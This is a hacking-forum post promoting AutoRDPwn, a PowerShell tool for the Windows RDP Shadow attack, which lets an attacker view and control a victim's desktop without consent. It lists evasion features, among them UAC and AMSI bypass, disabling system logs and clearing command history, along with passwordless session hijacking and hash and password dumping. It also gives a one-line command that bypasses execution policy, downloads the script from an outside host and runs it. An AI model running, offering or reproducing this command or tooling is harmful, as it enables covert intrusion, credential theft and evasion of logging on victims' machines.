• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

The Shadow Attack Framework + Guide

Status
Not open for further replies.

dEEpEst

☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Mar 29, 2018
Messages
13,861
Solutions
4
Reputation
32
Reaction score
45,552
Points
1,813
Credits
55,350
‎7 Years of Service‎
 
56%
45109339-8b203580-b13f-11e8-9de7-1210114313bb.png


AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.


Requirements


Powershell 5.0 or higher


Changes



Version 4.5


• New ninja style icon!

• Automatic cleaning of Powershell history after execution

• Now all dependencies are downloaded from the same repository

• Many errors and bugs fixed

• UAC & AMSI bypass in 64-bit systems

• New module available: Remote Desktop Forensics

• New module available: Disable system logs (Invoke-Phant0m)

• New module available: Sticky Keys Hacking

• New available module: Local Port Forwarding

• New available module: Powershell Web Server

• New available attack: Session Hijacking (passwordless)

WARNING! This attack is very intrusive and can only be used locally

*The rest of the changes can be consulted in the CHANGELOG file


Use


This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.

One line execution:

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"


The detailed guide of use can be found at the following link:

To see this hidden content, you must like this content.

Screenshots


This link is hidden for visitors. Please Log in or register now.
This link is hidden for visitors. Please Log in or register now.


Download:

To see this hidden content, you must like this content.
 
Status
Not open for further replies.
Back
Top